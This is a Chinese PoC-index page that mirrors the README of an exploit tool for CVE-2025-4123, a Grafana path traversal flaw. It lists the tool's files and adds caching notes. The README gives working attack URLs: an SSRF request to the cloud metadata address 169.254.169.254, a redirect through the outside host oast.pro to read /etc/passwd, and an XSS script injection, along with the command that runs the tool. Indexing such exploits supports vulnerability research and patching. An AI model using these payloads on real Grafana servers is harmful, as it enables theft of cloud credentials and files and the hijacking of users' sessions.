POC详情: 39fe7a34d6c48fd2bf548dd5cea1e20676075445

来源
https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
关联漏洞
标题: Grafana 安全漏洞 (CVE-2025-4123)
描述:Grafana是Grafana开源的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana存在安全漏洞,该漏洞源于客户端路径遍历和开放重定向结合,可能导致跨站脚本攻击。
描述
CVE-2025-4123 - Grafana Tool
介绍

# CVE-2025-4123 - Grafana Path Traversal Exploit

> Developed by **mitsec**

This is a proof-of-concept (PoC) exploit tool for **CVE-2025-4123**, a critical path traversal vulnerability in Grafana's `/public` endpoint. The exploit allows for:

- ✅ Server-Side Request Forgery (SSRF)
- ✅ Local File Inclusion (LFI)
- ✅ Open Redirect
- ✅ Cross-Site Scripting (XSS)

## 🔥 Affected

Grafana instances with `/public/` endpoint improperly handling encoded paths like:
```
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
```

---

## 🚀 Usage

```bash
python3 cve_2025_4123_exploit_mitsec_final.py
```

Then select the desired mode:

1. SSRF - Internal services like `169.254.169.254`
2. LFI  - Read files like `/etc/passwd`
3. Open Redirect - Redirect to external domains
4. XSS - JavaScript injection in public path

---

## 🧪 Example

```bash
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
```

---

## 📄 Disclaimer

This code is provided for educational and authorized testing purposes only. Unauthorized use against systems without consent is illegal.

---

## ✍️ Author

- [mitsec](https://github.com/ynsmroztas)
文件快照

 [4.0K]  /data/pocs/39fe7a34d6c48fd2bf548dd5cea1e20676075445
├── [2.8K]  cve_2025_4123_exploit-mitsec.py
├── [274K]  Grafana.jpg
└── [1.3K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。